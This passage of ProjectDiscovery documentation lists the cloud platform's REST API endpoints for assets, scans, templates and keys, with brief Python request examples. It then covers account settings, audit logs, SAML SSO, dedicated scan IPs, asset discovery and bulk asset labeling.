# Delete Asset
Source: https://docs.projectdiscovery.io/api-reference/assets/delete-asset
delete /v1/assets/{asset_Id}
Delete asset by ID
# Get Asset Content
Source: https://docs.projectdiscovery.io/api-reference/assets/get-asset-content
get /v1/assets/{asset_id}/contents
Get user asset content
# Get Asset Metadata
Source: https://docs.projectdiscovery.io/api-reference/assets/get-asset-metadata
get /v1/assets/{asset_Id}
Get asset metadata
# Update Asset Content
Source: https://docs.projectdiscovery.io/api-reference/assets/update-asset-content
patch /v1/assets/{asset_id}/contents
Update existing asset content
# Upload Asset
Source: https://docs.projectdiscovery.io/api-reference/assets/upload-asset
post /v1/assets
Manually upload user assets (uploaded assets are added to the manual enumeration)
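A minimal Python sketch of calling this endpoint is below; the request body fields (`name`, `contents`) and the `https://api.projectdiscovery.io` base URL are illustrative assumptions, so check the endpoint page for the actual schema:

```python
# Hedged sketch: POST /v1/assets (Upload Asset).
# The base URL and body fields below are assumptions for illustration only.
import requests

resp = requests.post(
    "https://api.projectdiscovery.io/v1/assets",    # assumed base URL
    headers={"X-Api-Key": "<your-api-key>"},
    json={
        "name": "external-hosts",                   # hypothetical field
        "contents": "example.com\n203.0.113.10",    # hypothetical field: newline-separated hosts
    },
    timeout=30,
)
resp.raise_for_status()
print(resp.json())
```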
# Add Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/add-config
post /v1/scans/config
Add a new scan configuration
# Add excluded templates
Source: https://docs.projectdiscovery.io/api-reference/configurations/add-excluded-templates
post /v1/scans/config/exclude
Add excluded templates
# Delete Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/delete-config
delete /v1/scans/config/{config_id}
Delete scan configuration
# Delete excluded template ids
Source: https://docs.projectdiscovery.io/api-reference/configurations/delete-excluded-template-ids
delete /v1/scans/config/exclude
Delete excluded template ids
# Get Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/get-config
get /v1/scans/config/{config_id}
Get a scan configuration
# Get Configs List
Source: https://docs.projectdiscovery.io/api-reference/configurations/get-configs-list
get /v1/scans/config
Get user scan configurations list
# Get excluded templates
Source: https://docs.projectdiscovery.io/api-reference/configurations/get-excluded-templates
get /v1/scans/config/exclude
Get excluded templates
# Update Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/update-config
patch /v1/scans/config/{config_id}
Update existing scan configuration
# Get elogs of given scan id
Source: https://docs.projectdiscovery.io/api-reference/elog/get-elogs-of-given-scan-id
get /v1/scans/{scan_id}/error_log
# Create Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/create-enumeration
post /v1/asset/enumerate
Create a new enumeration
# Delete Bulk Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/delete-assets-in-bulk
delete /v1/asset/enumerate
Delete enumerations by enumerate ids
# Delete Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/delete-enumeration
delete /v1/asset/enumerate/{enumerate_id}
Delete enumeration by enumerate_id
# Delete Enumeration Schedule
Source: https://docs.projectdiscovery.io/api-reference/enumerations/delete-enumeration-schedule
delete /v1/enumeration/schedule
Delete a re-scan schedule
# Export Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/export-enumeration
get /v1/asset/enumerate/{enum_id}/export
Export enumeration content
# Export Enumeration of user
Source: https://docs.projectdiscovery.io/api-reference/enumerations/export-enumeration-of-user
get /v1/asset/enumerate/export
Export enumeration content
# Get All Enumeration Contents
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-all-enumeration-contents
get /v1/asset/enumerate/contents
Get all enumeration contents
# Get all enumeration stats
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-all-enumeration-stats
get /v1/asset/enumerate/stats
# Get Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration
get /v1/asset/enumerate/{enumerate_id}
Get enumeration by enumerate_id
# Get enumeration config
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-config
get /v1/asset/enumerate/{enumerate_id}/config
# Get Enumeration Contents
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-contents
get /v1/asset/enumerate/{enumerate_id}/contents
Get enumeration content by enumerate_id
# Get Enumeration List
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-list
get /v1/asset/enumerate
Get enumeration list
# Get Enumeration Schedules
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-schedules
get /v1/enumeration/schedule
Get enumeration re-scan schedule
# Get enumeration stats
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-stats
get /v1/asset/enumerate/{enumerate_id}/stats
# Group assets by filters
Source: https://docs.projectdiscovery.io/api-reference/enumerations/group-assets-by-filters
get /v1/asset/enumerate/filters
# Group assets by filters for an enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/group-assets-by-filters-for-an-enumeration
get /v1/asset/enumerate/{enumerate_id}/filters
# Rescan Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/rescan-enumeration
post /v1/asset/enumerate/{enumerate_id}/rescan
Re-run an existing enumeration
# Set Enumeration Schedule
Source: https://docs.projectdiscovery.io/api-reference/enumerations/set-enumeration-schedule
post /v1/enumeration/schedule
Set enumeration re-scan frequency
# Stop Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/stop-enumeration
post /v1/asset/enumerate/{enumerate_id}/stop
Stop a running enumeration
# Update Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/update-enumeration
patch /v1/asset/enumerate/{enumerate_id}
Update enumeration by enumerate_id
# Get audit logs for team
Source: https://docs.projectdiscovery.io/api-reference/get-audit-logs-for-team
get /v1/team/audit_log
# Cloud API Reference Introduction
Source: https://docs.projectdiscovery.io/api-reference/introduction
Details on the ProjectDiscovery API
## Overview
The ProjectDiscovery API v1 is organized around [REST](http://en.wikipedia.org/wiki/Representational_State_Transfer). Our API has resource-oriented URLs, accepts and returns JSON in most cases, and the API uses standard HTTP response codes, authentication, and verbs. Our API also conforms to the [OpenAPI Specification](https://www.openapis.org/).
This API documentation walks you through each of the available resources and provides code examples for `cURL`, `Python`, `JavaScript`, `PHP`, `Go`, and `Java`. Each endpoint includes the required authorization information and parameters, and provides examples of the response you should expect.
## Authentication
The ProjectDiscovery API uses API keys to authenticate requests. You can view and manage your API key in ProjectDiscovery at [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) under your user information.
Authentication with the API is performed using a custom request header, `X-Api-Key`, set to the value of the API key associated with your ProjectDiscovery account.
You must make all API calls over `HTTPS`. Calls made over plain HTTP will fail, as will requests without authentication or without all required parameters.
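As a minimal sketch, the Python request below sets the `X-Api-Key` header against the Get User Profile endpoint (`GET /v1/user`) documented in this reference; the `https://api.projectdiscovery.io` base URL is an assumption and may differ for your environment:

```python
# Hedged sketch: authenticated request using the X-Api-Key header.
import requests

PDCP_API_KEY = "<your-api-key>"  # from your profile at https://cloud.projectdiscovery.io/

resp = requests.get(
    "https://api.projectdiscovery.io/v1/user",  # assumed base URL; endpoint documented below
    headers={"X-Api-Key": PDCP_API_KEY},
    timeout=30,
)
resp.raise_for_status()          # non-2xx responses (e.g. 401 for a bad key) raise here
print(resp.json())               # user profile and permissions
```

The same header applies to every endpoint in this reference.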
## Resources
Below (and in the menu on the left) you can find the various resources available to the ProjectDiscovery API.
* Your assets (hosts, CIDR ranges, etc.) for scanning.
* Access public and private templates as well as AI template creation.
* Manage scans, scan schedules, and create new scans.
* See and manage vulnerabilities detected by PDCP.
* Retest vulnerabilities or run single template/target scans.
* See and manage user settings, API keys and more.
# Get All Results
Source: https://docs.projectdiscovery.io/api-reference/results/get-all-results
get /v1/scans/results
Get scan results of a user
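A hedged Python sketch of paging through this endpoint; the `limit`/`offset` query parameters and the `data` response key are assumptions for illustration:

```python
# Hedged sketch: GET /v1/scans/results (Get All Results).
import requests

resp = requests.get(
    "https://api.projectdiscovery.io/v1/scans/results",  # assumed base URL
    headers={"X-Api-Key": "<your-api-key>"},
    params={"limit": 100, "offset": 0},                   # hypothetical pagination params
    timeout=30,
)
resp.raise_for_status()
for finding in resp.json().get("data", []):               # "data" key is an assumption
    print(finding)
```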
# Get Results Stats
Source: https://docs.projectdiscovery.io/api-reference/results/get-results-stats
get /v1/scans/results/stats
Get user scan results stats
# Get Scan Results
Source: https://docs.projectdiscovery.io/api-reference/results/get-scan-results
get /v1/scans/result/{scanId}
Get results of a specific scan by ID
# Get Scan Vulnerability
Source: https://docs.projectdiscovery.io/api-reference/results/get-scan-vulnerability
get /v1/scans/vuln/{vuln_id}
Get scan result vulnerability by ID
# Get Scans Result Filters
Source: https://docs.projectdiscovery.io/api-reference/results/get-scans-result-filters
get /v1/scans/results/filters
Get user scan-result filters
# Get scan log of given scan id
Source: https://docs.projectdiscovery.io/api-reference/scan_log/get-scan-log-of-given-scan-id
get /v1/scans/{scan_id}/scan_log
# Create Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/create-scan
post /v1/scans
Trigger a scan
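A hedged Python sketch of triggering a scan; the body fields (`name`, `targets`) are illustrative placeholders, so consult the endpoint page for the actual request schema:

```python
# Hedged sketch: POST /v1/scans (Create Scan).
import requests

resp = requests.post(
    "https://api.projectdiscovery.io/v1/scans",   # assumed base URL
    headers={"X-Api-Key": "<your-api-key>"},
    json={
        "name": "example-scan",                   # hypothetical field
        "targets": ["https://example.com"],       # hypothetical field
    },
    timeout=60,
)
resp.raise_for_status()
print(resp.json())  # the response is expected to include the new scan's ID
```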
# Create vulns export to tracker
Source: https://docs.projectdiscovery.io/api-reference/scans/create-vulns-export-to-tracker
post /v1/scans/vulns/{vuln_id}/ticket
Create vulns export to tracker
# Delete Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan
delete /v1/scans/{scan_id}
Delete a scan using scanId
# Delete Bulk Scans
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan-in-bulk
delete /v1/scans
Delete multiple scans using scan ids
# Delete Scan Schedule
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan-schedule
delete /v1/scans/schedule
Delete scan schedule for a user
# Delete Scan Vulnerability
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan-vulnerability
delete /v1/scans/vulns
Batch Delete scan vulnerability
# Export Filtered Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/export-filtered-scan
post /v1/scans/{scan_id}/export
Export filtered scan results
# Export Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/export-scan
get /v1/scans/{scan_id}/export
Export scan results
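A hedged Python sketch that streams the export to a local file; the `format` query parameter is an assumption:

```python
# Hedged sketch: GET /v1/scans/{scan_id}/export (Export Scan), saved to disk.
import requests

scan_id = "<scan-id>"
with requests.get(
    f"https://api.projectdiscovery.io/v1/scans/{scan_id}/export",  # assumed base URL
    headers={"X-Api-Key": "<your-api-key>"},
    params={"format": "json"},                                     # hypothetical parameter
    stream=True,
    timeout=120,
) as resp:
    resp.raise_for_status()
    with open(f"scan-{scan_id}-export.json", "wb") as fh:
        for chunk in resp.iter_content(chunk_size=8192):
            fh.write(chunk)
```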
# Export Scan Vulnerability
Source: https://docs.projectdiscovery.io/api-reference/scans/export-scan-vulnerability
get /v1/scans/vuln/{vuln_id}/export
Export a specific scan vulnerability
# Get All Scan Stats
Source: https://docs.projectdiscovery.io/api-reference/scans/get-all-scan-stats
get /v1/scans/stats
Get all scans statistics for a user
# Get All Scans History
Source: https://docs.projectdiscovery.io/api-reference/scans/get-all-scans-history
get /v1/scans/history
Get user scan history details
# Get Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan
get /v1/scans/{scan_id}
Get details of a scan by scan ID
# Get Scan Config
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-config
get /v1/scans/{scan_id}/config
Get scan metadata config
# Get Scan History
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-history
get /v1/scans/{scanId}/history
Get scan history detail by scanId
# Get Scan IPs
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-ips
get /v1/scans/scan_ips
Get list of static IPs used for scan
# Get Scan List
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-list
get /v1/scans
Get user scans status
# Get Scan Schedules
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-schedules
get /v1/scans/schedule
Get scan schedules for a user
# Get Scans Token
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scans-token
get /v1/scans/token
Get user scan token usage details
# Import OSS Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/import-oss-scan
post /v1/scans/import
Import scan details
# Rescan scan
Source: https://docs.projectdiscovery.io/api-reference/scans/rescan-scan
post /v1/scans/{scan_id}/rescan
Re-run an existing scan
# Retest vulnerability
Source: https://docs.projectdiscovery.io/api-reference/scans/retest-vulnerability
post /v1/scans/{vuln_id}/retest
Retest a scan vulnerability
# Set Scan Schedule
Source: https://docs.projectdiscovery.io/api-reference/scans/set-scan-schedule
post /v1/scans/schedule
Set a scan schedule for a user
# Stop Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/stop-scan
post /v1/scans/{scan_id}/stop
Stop a running scan; this has no effect on scans in any other state.
# Update Imported Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/update-imported-scan
patch /v1/scans/{scan_id}/import
Import more results to a given scan
# Update Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/update-scan
patch /v1/scans/{scan_id}
Update scan metadata
# Update Scan Config
Source: https://docs.projectdiscovery.io/api-reference/scans/update-scan-config
patch /v1/scans/{scan_id}/config
Update scan metadata config
# Update Vulnerability Labels
Source: https://docs.projectdiscovery.io/api-reference/scans/update-vulnerability-labels
patch /v1/scans/vulns/labels
Batch update vulnerability labels
# Update Vulnerability Status
Source: https://docs.projectdiscovery.io/api-reference/scans/update-vulnerability-status
patch /v1/scans/vulns
Batch update vulnerability status
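A hedged Python sketch of a batch status update; the body fields (`vuln_ids`, `status`) are illustrative placeholders:

```python
# Hedged sketch: PATCH /v1/scans/vulns (batch Update Vulnerability Status).
import requests

resp = requests.patch(
    "https://api.projectdiscovery.io/v1/scans/vulns",  # assumed base URL
    headers={"X-Api-Key": "<your-api-key>"},
    json={
        "vuln_ids": ["<vuln-id-1>", "<vuln-id-2>"],     # hypothetical field
        "status": "fixed",                              # hypothetical field/value
    },
    timeout=30,
)
resp.raise_for_status()
print(resp.status_code)
```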
# Create Template
Source: https://docs.projectdiscovery.io/api-reference/templates/create-template
post /v1/template
Create a private template
# Delete Template
Source: https://docs.projectdiscovery.io/api-reference/templates/delete-template
delete /v1/template/{template_id}
Delete private template using ID
# Generate AI Template
Source: https://docs.projectdiscovery.io/api-reference/templates/generate-ai-template
post /v1/template/ai
Generate a private template with AI Engine
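A hedged Python sketch; the `prompt` body field is an assumption about the request schema:

```python
# Hedged sketch: POST /v1/template/ai (Generate AI Template).
import requests

resp = requests.post(
    "https://api.projectdiscovery.io/v1/template/ai",         # assumed base URL
    headers={"X-Api-Key": "<your-api-key>"},
    json={"prompt": "Detect exposed .env files over HTTP"},   # hypothetical field
    timeout=120,
)
resp.raise_for_status()
print(resp.json())  # expected to contain the generated template
```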
# Get Early Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-early-template
get /v1/template/early/{id}
Get early template text
# Get Early Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-early-template-list
get /v1/template/early
Get PDCP early template list
# Get GitHub Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-github-template
get /v1/template/github/{id}
Get GitHub template text
# Get GitHub Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-github-template-list
get /v1/template/github
List of all the user's GitHub templates
# Get Public Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-public-template
get /v1/template/public/*
Get public template text using path
# Get Public Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-public-template-list
get /v1/template/public
Get public-template list
# Get Public Template Stats
Source: https://docs.projectdiscovery.io/api-reference/templates/get-public-template-stats
get /v1/template/stats
Get public template statistics
# Get Share Status
Source: https://docs.projectdiscovery.io/api-reference/templates/get-share-status
get /v1/template/share
Get template shared status (shared-with-link)
# Get Shared Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-shared-template
get /v1/template/share/{template_id}
Get a shared template text
# Get Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-template
get /v1/template/{template_id}
Get private template text using ID
# Get Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-template-list
get /v1/template
Get user's private (my) templates
# Share Template
Source: https://docs.projectdiscovery.io/api-reference/templates/share-template
post /v1/template/share
Share a private template (shared-with-link)
# Update Template
Source: https://docs.projectdiscovery.io/api-reference/templates/update-template
patch /v1/template
Update existing private template
# Update enumeration config
Source: https://docs.projectdiscovery.io/api-reference/update-enumeration-config
patch /v1/asset/enumerate/{enumerate_id}/config
# Create API Key
Source: https://docs.projectdiscovery.io/api-reference/users/create-api-key
post /v1/user/apikey
Create user api-key; this won't create a new api-key if one already exists.
# Delete API Key
Source: https://docs.projectdiscovery.io/api-reference/users/delete-api-key
delete /v1/user/apikey
Delete user api-key
# Get API Key
Source: https://docs.projectdiscovery.io/api-reference/users/get-api-key
get /v1/user/apikey
Get user api-key
# Get User Profile
Source: https://docs.projectdiscovery.io/api-reference/users/get-user-profile
get /v1/user
Get user profile and permissions
# Rotate API Key
Source: https://docs.projectdiscovery.io/api-reference/users/rotate-api-key
post /v1/user/apikey/rotate
Rotate user api-key
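A hedged Python sketch; the exact response shape is not shown here, so inspect it for the newly issued key and update any clients still using the old one:

```python
# Hedged sketch: POST /v1/user/apikey/rotate (Rotate API Key).
import requests

resp = requests.post(
    "https://api.projectdiscovery.io/v1/user/apikey/rotate",  # assumed base URL
    headers={"X-Api-Key": "<current-api-key>"},
    timeout=30,
)
resp.raise_for_status()
print(resp.json())  # response is expected to contain the new api-key
```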
# Settings & Administration
Source: https://docs.projectdiscovery.io/cloud/admin
Review administrative, team, and account settings
## Summary
This guide covers general account administration under settings in our cloud platform. These administrative and system settings include details about your account, team settings for administrators, and password/2FA.
If you have questions about settings that are not covered here, or functionality that you think would be helpful - [get in touch.](/help)
For details on other settings check out the guides for those features.
* [Scanning](/cloud/scanning/overview)
* [Assets](/cloud/assets/overview)
* [Templates](/cloud/editor/overview)
## Settings
[Profile settings](https://cloud.projectdiscovery.io/settings) are available from the global navigation under your sign-in (top right) for access to your Profile, Team, Scan IPs and more.
## Profile
Profile displays your username, email address, and the option to delete your account.
*Note: The ability to update these profile components will be available in a future release.*
## Team
Under **Settings → Team** all users can view team settings. Users with the appropriate permissions can also modify team settings and manage team members.
View or update team names, manage team members, and delete teams (supported for team owners).
* Use **Create Team** to create a new team (up to 2 for Pro Tier).
* To modify a team's settings, select that team from the global navigation.
### User Types
ProjectDiscovery supports four types of users with the following permissions:
* Owner: Read, write, invite, billing
* Admin: Read, write, invite
* Member: Read, write
* Viewer: Read
### Managing Teams
Teams can be created by Pro and Custom tier users. A Pro subscription supports up to two teams with 10 members. For a larger number of teams, or a greater number of members, get in touch about a Custom tier configuration.
## Scan IPs
Add Static IPs for greater control over your infrastructure scanning.
## Billing
Purchase, view, or modify your subscription. A subscription to our Pro tier starts at \$250/month for scanning of up to 1000 unique assets.
Additional upgrade options are also available with higher monthly asset limits - reach out to us with any questions about a custom contract.
## Security (Account Security)
Use Security to update your password or to enable 2-factor authentication.
* **Password** creates an account password that provides a login with your email (username) and password, as an alternative to using a linked account for login. These credentials will not replace any existing login configurations (for example: GitHub).
* **Two-step authentication** provides additional authentication for your account with an authenticator application.
# Audit Logs
Source: https://docs.projectdiscovery.io/cloud/admin/audit-logs
Track and monitor all user activities and system events across your organization
Audit Logs are available exclusively for Enterprise customers. Contact our [sales team](https://projectdiscovery.io/request-demo) to learn more about Enterprise features.
ProjectDiscovery's Audit Logs provide comprehensive visibility into all user activities and system events within your organization's ProjectDiscovery Cloud environment. The audit logging system captures detailed information about every significant action, including user logins, asset modifications, scan initiations, configuration changes, and API access events. Each log entry contains essential metadata such as the timestamp, user identity, IP address, action type, and affected resources, enabling security teams to maintain complete accountability and traceability.
The audit logging interface presents events in a chronological timeline, with advanced filtering capabilities that allow you to search and analyze specific types of activities. Security administrators can filter logs based on multiple parameters including time ranges, user identities, action types, and affected resources. This granular filtering helps during security investigations, compliance audits, or when tracking specific changes across your organization's security workflows.
From a security operations perspective, the audit logs serve as a crucial tool for detecting unusual patterns or potentially unauthorized activities. For instance, you can identify unusual scan patterns, track template modifications, or monitor API key usage across your organization. The system retains audit logs for an extended period, ensuring you have historical data available for compliance requirements or security investigations.
Integration capabilities allow you to export audit logs to your existing security information and event management (SIEM) systems through our API. This enables you to incorporate ProjectDiscovery activity data into your broader security monitoring and alerting workflows. The audit log data can be particularly valuable during incident response scenarios, providing a clear timeline of events and actions leading up to or following a security event.
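As a hedged sketch of that export path, the snippet below pulls events from the audit log endpoint documented in this reference (`GET /v1/team/audit_log`) so they can be forwarded to a SIEM; the `since` filter and the `data` response key are assumptions for illustration:

```python
# Hedged sketch: pull team audit log events for SIEM forwarding.
import requests

resp = requests.get(
    "https://api.projectdiscovery.io/v1/team/audit_log",  # assumed base URL
    headers={"X-Api-Key": "<your-api-key>"},
    params={"since": "2024-01-01T00:00:00Z"},              # hypothetical filter
    timeout=30,
)
resp.raise_for_status()
for event in resp.json().get("data", []):                  # "data" key is an assumption
    print(event)  # replace with a call to your SIEM ingestion endpoint
```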
For organizations with compliance requirements, our audit logs help demonstrate adherence to various security frameworks and regulations. The comprehensive logging of user actions, access patterns, and system changes provides the necessary documentation for security audits and compliance reviews. Each log entry is immutable and cryptographically signed, ensuring the integrity of your audit trail.
# SAML SSO
Source: https://docs.projectdiscovery.io/cloud/admin/saml-sso
Enterprise Single Sign-On (SSO) integration for secure team access
SAML SSO is available exclusively for Pro (as an add-on) and Enterprise customers. Contact our [sales team](https://projectdiscovery.io/request-demo) to enable SAML SSO for your organization.
ProjectDiscovery supports Enterprise Single Sign-On (SSO) through SAML 2.0, enabling seamless and secure authentication using your organization's Identity Provider (IdP). Our SAML implementation is powered by Clerk, providing robust support for major identity providers including:
* Microsoft Azure AD
* Google Workspace
* Okta Workforce
* Custom SAML Providers
## Implementation Process
SAML SSO setup requires manual configuration and verification by the ProjectDiscovery team to ensure secure implementation. Here's what to expect:
1. **Initial Setup Request**
* After purchasing a Pro plan with SSO add-on or Enterprise contract
* The ProjectDiscovery team will reach out to begin the configuration process
* You'll be assigned a dedicated technical contact for the setup
2. **Configuration Steps**
* Provide your IdP metadata and certificates
* Configure allowed domains and user attributes
* Set up SAML assertion mapping
* Test the integration in a staging environment
3. **Verification & Go-Live**
* Validate user provisioning and authentication
* Confirm security settings and access controls
* Enable the integration for production use
## Supported Features
Our SAML integration includes comprehensive enterprise-grade features:
* **Automated User Provisioning**
* Just-in-Time (JIT) user creation
* Attribute mapping for user profiles
* Role and permission synchronization
* **Security Controls**
* Domain-based access restrictions
* Enforced SSO for specified domains
* Session management and timeout settings
* **Advanced Options**
* Support for IdP-initiated SSO
* Multi-factor authentication integration
* Custom attribute mapping
## Important Notes
* SAML SSO setup requires manual configuration due to its security-critical nature
* The setup process typically takes 1-2 business days
* All configurations are thoroughly tested before production deployment
* Changes to SAML settings may require ProjectDiscovery team assistance
* Existing users can be migrated to SSO authentication seamlessly
## Getting Started
To enable SAML SSO for your organization:
1. Ensure you have a Pro plan with SSO add-on or Enterprise contract
2. Contact your account representative or [sales team](https://projectdiscovery.io/request-demo)
3. Prepare your IdP configuration details
4. Schedule a setup call with our technical team
Our team will guide you through the entire process, ensuring a secure and successful implementation of SAML SSO for your organization.
# Scan IPs for Whitelisting
Source: https://docs.projectdiscovery.io/cloud/admin/scan-ips
Configure and manage scanning IP addresses for enterprise security controls
Dedicated Scan IPs are available exclusively for Enterprise customers. Contact our [sales team](https://projectdiscovery.io/request-demo) to learn more about Enterprise features.
ProjectDiscovery's Enterprise scanning infrastructure operates from a dedicated set of static IP addresses, enabling organizations to implement precise security controls and whitelisting policies. These fixed IP ranges are exclusively assigned to your organization's scanning activities, providing consistent and identifiable sources for all security assessments conducted through the platform. This dedicated IP infrastructure ensures that your security teams can easily distinguish ProjectDiscovery's legitimate scanning traffic from potential unauthorized scanning attempts.
When configuring your security infrastructure to accommodate ProjectDiscovery scans, you can whitelist these specific IP addresses in your firewalls, Web Application Firewalls (WAFs), or Intrusion Prevention Systems (IPS). This whitelisting approach allows you to maintain strict security controls while ensuring uninterrupted vulnerability scanning operations. The platform provides both IPv4 and IPv6 addresses, supporting organizations with diverse network configurations and compliance requirements.
Enterprise customers can customize scanning behavior on a per-IP basis, including the ability to set specific rate limits, configure custom headers, or assign particular IPs to different types of scans. This granular control helps organizations optimize their scanning operations while maintaining compliance with internal security policies. For instance, you might assign certain IPs for external asset discovery while reserving others for intensive vulnerability scanning, ensuring proper resource allocation and traffic management.
The platform includes monitoring and analytics for scan traffic from these IPs, providing visibility into scanning patterns, bandwidth usage, and potential scanning issues. This monitoring helps security teams optimize their scanning strategies and troubleshoot any connectivity or performance problems. Additionally, if any of your security systems flag scanning activity from these IPs, you can quickly verify the legitimacy of the traffic against your assigned IP ranges.
For organizations operating in regulated environments or with strict security requirements, our dedicated IP infrastructure provides the necessary isolation and control. Each scanning IP is documented and can be included in security compliance documentation, making it easier to demonstrate proper security controls during audits. The platform also supports custom DNS resolution and proxy configurations when needed for specialized scanning scenarios.
# Adding Assets
Source: https://docs.projectdiscovery.io/cloud/assets/adding-assets
Learn how to add and manage assets in ProjectDiscovery
## Overview
Assets in our cloud platform can be any hosts you want to monitor - URLs, IP addresses, or CIDR ranges. There are three primary methods to add assets:
* Automatically discover and monitor assets from your root domains
* Connect cloud providers to import and sync assets automatically
* Programmatically add and manage assets using our REST API
## Asset Discovery
The fastest way to get started is through our asset discovery feature:
1. Navigate to **Assets → Add New Assets**
2. Enter root domains/CIDR/IPs based on your plan:
* Up to 10 root domains only
* Basic subdomain discovery
* HTTP probing
* Basic technology detection
* Limited cloud asset discovery
* Up to 100 root domains
* Advanced subdomain enumeration
* Port scanning (Top 1000 ports)
* Deep technology fingerprinting
* Cloud integration
* Historical data tracking
* Custom discovery schedules
* CIDR range scanning
* IP block discovery
* Network perimeter mapping
* Custom limits
* Advanced asset enrichment
* Advanced cloud correlation
* Custom enrichment rules
* Dedicated discovery nodes
* Priority asset updates
* ASN-based discovery
* Certificate chain analysis
* Subsidiary discovery
* Related domain correlation
* Company hierarchy mapping
* Acquisition tracking
Discovery features can be customized for Enterprise plans. Contact our [sales team](mailto:sales@projectdiscovery.io) for custom requirements.
# Custom & Bulk Asset Labeling
Source: https://docs.projectdiscovery.io/cloud/assets/custom-labeling
Create and manage custom labels for your assets with powerful bulk labeling capabilities
Custom Labels in ProjectDiscovery Cloud are user-defined tags that you can manually assign to any discovered asset. This feature works alongside the automatic, AI-driven labels that the platform generates. While the system's AI assigns labels for website types (e.g., API docs, internal apps, login pages, admin panels) and environments (e.g., production, staging, internal) by default, custom labels give you the flexibility to define your own categories and classifications for assets. In other words, you're not limited to the auto-generated labels – you can tag assets with labels that make sense for your organization's context (such as project names, owner teams, sensitivity, or any internal naming scheme).
### How They Work
Using the ProjectDiscovery Cloud interface, a user can select an asset and assign one or more custom labels to it. These labels then appear alongside the asset in the inventory, just like the AI-generated labels. This manual labeling is valuable for capturing contextual information that automated methods might not know. For example, you might label certain assets as "Critical" if they pertain to core infrastructure, or tag a set of hosts as "Internal" if they should not be exposed to the internet. By labeling assets in a way that mirrors your environment and business, you ensure that important attributes of each asset are immediately visible.
### Benefits
Custom labels allow security teams to organize assets according to custom criteria and quickly spot key asset properties at a glance. This user-driven categorization adds an extra layer of context – teams gain full control over how assets are categorized. It becomes easier to filter and group assets based on these tags (for example, viewing all assets labeled "Internal" or "Web-Server"). Ultimately, this leads to better asset management as the platform helps classify results to help you better organize, contextualize, and prioritize your assets. In practice, custom labels enable workflows like separating production vs. staging assets or flagging high-risk systems, so that teams can focus on relevant subsets of the attack surface during monitoring and scanning.
## Bulk Labeling
ProjectDiscovery Cloud also supports Bulk Labeling, which lets users apply a label to many assets at once, rather than tagging each asset individually. This feature is implemented through the platform's powerful filtering system. Users can filter their asset list by specific criteria and then assign a label to all assets matching that filter in a few clicks. In effect, bulk labeling dramatically speeds up the process of categorizing large numbers of assets.
### How It Works
The platform provides filtering across 14+ attributes of assets – you can narrow results by things like port number, technology, domain, IP, content length, and even by existing labels. Here's how to create and save bulk labels:
1. **Apply Filters**
* Navigate to the Assets view
* Click the "Filter" button in the top left
* Select your desired filter criteria (e.g., port, technology, domain)
* Apply multiple filters to refine your selection
2. **Select Assets**
* After filtering, review the matching assets
3. **Apply Labels**
* Click the "Label" button in the action bar
* Enter your label name or select from existing labels
* Click "Apply" to tag all selected assets
4. **Save as Dynamic Group** (Optional)
* Click "Save Filter" in the top right
* In the pop-up dialog, enter a name for your dynamic group
* Click "Save" to create your dynamic group
Your saved dynamic group will automatically update as new assets matching your filter criteria are discovered. For example, you could label all assets running on port 8088 as 'staging' in just a few clicks. This bulk tagging via filters approach means you don't have to manually edit each asset entry – the system streamlines it for you.
### Advantages
Bulk labeling is especially useful for applying environment or role labels to many assets simultaneously. It ensures consistency at scale – every asset meeting the criteria gets the exact same label, avoiding omissions or typos that might happen with one-by-one tagging. It's also a huge time-saver for large asset sets; teams can categorize hundreds or thousands of assets in seconds by leveraging filters, instead of minutes or hours. By making it easy to tag assets in bulk, ProjectDiscovery helps teams maintain an organized asset inventory even as new data pours in.
## Use Cases and Workflow Integration
Both custom labels and bulk labeling open up new use cases for integrating ProjectDiscovery into security team workflows:
### Environment Segmentation
